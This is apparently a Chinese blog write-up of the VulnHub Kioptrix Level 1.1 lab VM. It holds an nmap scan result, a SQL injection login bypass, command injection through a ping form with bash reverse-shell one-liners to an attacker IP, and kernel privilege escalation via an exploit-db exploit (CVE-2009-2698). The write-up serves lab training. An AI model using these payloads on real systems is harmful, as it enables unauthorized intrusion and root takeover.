vulnhub- Kioptrix: Level 1.1 (#2) (考点:sql注入/命令执行/linux版本提权)

最新推荐文章于 2022-03-03 19:27:13 发布
最新推荐文章于 2022-03-03 19:27:13 发布
阅读量433 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105621725
版权
本文详细介绍了如何利用Vulnhub上的Kioptrix 1.1 Level #2靶机进行漏洞利用。首先通过arp-scan和nmap发现目标主机,并尝试80端口的SQL注入,成功获取shell。接着,通过在ping命令后添加符号&执行命令,实现命令注入。由于系统版本较旧(2.6.9),作者决定直接进行提权,查找并下载适用于该版本的提权工具,最终通过gcc编译执行,成功获取root权限。
摘要由CSDN通过智能技术生成

arp-scan -l
扫出来多的那个就是

nmap

map scan report for 192.168.189.164
Host is up (0.00054s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-19T08:22:47+00:00; -3h09m39s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

先进80看看

直接登录框
在这里插入图片描述
当然要先试试sql注入了admin' or '1'='1,密码随便

进去后是这个ping
如果你ping的后面加上 & 后面才插命令,它也会执行,这里就可以加弹shell命令。这个在hackthebox里也有类似的靶机,参考crono
后面换上自己的地址

10.10.14.3 & bash -i >& /dev/tcp/192.xxx.xxx.xxx/4444 0>&1

本机打开监听,收到

先用这个把shell变成tty方便一些

python -c 'import pty; pty.spawn("/bin/bash")'

然后准备我做所有linux机的老套路linpeas.sh。但是执行不了。。奇怪。。home的文件夹也进不了
我觉得自己想复杂了。先看下uname -a
版本信息2.6.9很老、、直接提权就行了

用这个提权工具

./linux-exploit-suggester.sh -k 2.6.9

搜出很多建议
在里面打开网页找哪个是提权相关的

比如这个

[+] [CVE-2009-2698] ip_append_data

   Details: https://www.exploit-db.com/exploits/9542/
   Exposure: less probable
   Tags: fedora=4|5|6,RHEL=4
   Download URL: https://www.exploit-db.com/download/9542

打开相应网站,也写了Privilege Escalation提权,版本也对得上
在这里插入图片描述

就这个。下载下来。python -m SimpleHTTPServer 80开启本机的80,wget到/tmp,毕竟tmp,权限很松,都有写,修改文件的权限
gcc 9542.c -o 9542

执行,成功root
在这里插入图片描述

冬萍子
关注
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 593
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 873
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
VulnHub——Kioptrix Level 3
江左盟的博客
05-28 2995
目录 简介 信息收集 漏洞检测与利用 权限提升 总结 简介 该靶机还是一如既往的简单,通过信息收集发现Web服务使用LotusCMS,使用Google搜索发现存在已知漏洞,通过漏洞利用脚本获得webshell,然后通过内核漏洞直接提升权限到root。 信息收集 探测目标主机IP地址,如图: 然后对目标主机进行快速端口扫描,发现开启22和80端口,OpenSSH版本4.7p1,Apache版本2.2.8,PHP版本5.2.4-2,操作系统可能为Debian或Ubuntu,内核版本为2.
Vulnhub-靶机-Kioptrix: Level 1 (#1)
qq_43264813的博客
01-28 666
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.4
vulnhub 靶机 Kioptrix Level 1渗透笔记
weixin_52268949的博客
03-03 5509
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 192.168.101.0/24 扫描开放端口 nmap -A -p- 192.168.101.20 这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本 msfconsole msf6 > use auxiliary/scanner/smb/smb_version
sql注入系统命令 linux,SQL注入
weixin_39791446的博客
05-16 490
可能大家还不是对SQL注入这个概念不是很清楚,简单地说,SQL注入就是攻击者通过正常的WEB页面,把自己SQL代码传入到应用程序中,从而通过执行非程序员预期的SQL代码,达到窃取数据或破坏的目的。当应用程序使用输入内容来构造动态SQL语句以访问数据库时,会发生SQL注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生SQL注入SQL注入可能导致攻击者使用...
vulhub - Kioptrix: Level 1.1 (#2) writeup
Jiajiajiang_的博客
12-12 759
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 找到IP为:172.21.137.47 端口...
vulhub - Kioptrix: Level 1 (#1) writeup
Jiajiajiang_的博客
12-03 855
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 发现此靶机IP为172.21.137.46 如果内网...
VulnHub Kioptrix Level 1进行渗透测试的总结与过程
Ba1_Ma0的博客
03-01 1631
Kioptrix_Level_1 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释 -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: ip192.168.1.104与ip192.168.1.103都是我的主机,只有ip192.168.1.102是未知的主机,所以目标主机ip为192.168.1.102。 内网发现也能用nm
提权信息收集自动化脚本-LinPEAS
最新发布
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
Web渗透测试之SQL注入Level1--初识SQL注入
vodkaDL的博客
10-24 609
前言 在Web框架技术日益成熟的今天,如正则过滤、字符串过滤等守门人让SQL注入逐渐变得不可能,但笔者坚信,只要是人开发出来的东西,就一定会存在漏洞。正如采用过滤非法字符的方式防范SQL注入一样,SQL注入时也可采用注释、URL编码等方式绕过过滤。只要没有颠覆原有基础知识体系,重新创造出新的结构体系,那么SQL注入与防御技术就会在两者的对抗中不断发展。 因此笔者将会采用以解题的方式,模拟SQL注入的过程。正所谓知己知彼,百战不殆,如果明白了SQL注入攻击的方式,无论是对测试人员还是开发人员,都是大有裨益的。
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录
weixin_45509443的博客
06-19 474
环境:靶机:192.168.1.107 kali:192.168.106 主机发现 端口扫描 浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录 成功进入,经典ping命令,存在命令执行 kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机 成功反弹但不是root权限,开始...
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1203
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
Vulnhub系列:Kioptrix Level 2
Fuzz
07-31 282
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 运行环境 kali:192.168.44.128 Vulnhub靶机:192.168.44.133 相关知识点 0x00、信息收集 主机发现 :nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV -T5 -p- 192.168.44.133 0x01、Web 发现 ...
Vulnhub靶机Kioptrix Level 2 writeup
xingjinhao123的博客
01-09 1236
Vulnhub靶机Kioptrix Level 2渗透
Kioptrix-1
猎荒者
03-16 1027
夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远 00 环境准备 Kali(IP:10.10.16.128) Kioptrix 靶机 NAT 网络连接 01 主机发现 nmap -sP 10.10.16.0/24 02 端口扫描 nmap -A -v -sS -sP -p- -T4 10.10.16.152 得到开放的端口:22,80,111,139,443,1024,并...
kioptrix.level1 -VulnHub靶机学习记录
weixin_45509443的博客
06-16 572
1.
Vulnhub靶机系列:pWnOS: 1.0
汗的博客
03-29 2511
https://www.hackingarticles.in/hack-the-pwnos-1-0-boot-to-root/ 文章目录靶机地址利用知识信息收集Getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-10,33/ tip:如果Vmware在首次引导时询问您是复制还是移动了该虚拟机,请单击MOVED!否则,网络设置可能会混乱。 利用知识...
2010年IEC 61508-2:电气/电子/程序安全系统设计要求详解
IEC 61508-2:2010 是国际电工委员会(International Electrotechnical Commission,IEC)发布的一份关于电气、电子和可编程电子安全相关系统(Electrical/Electronic/Programmable Electronic Safety-Related ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值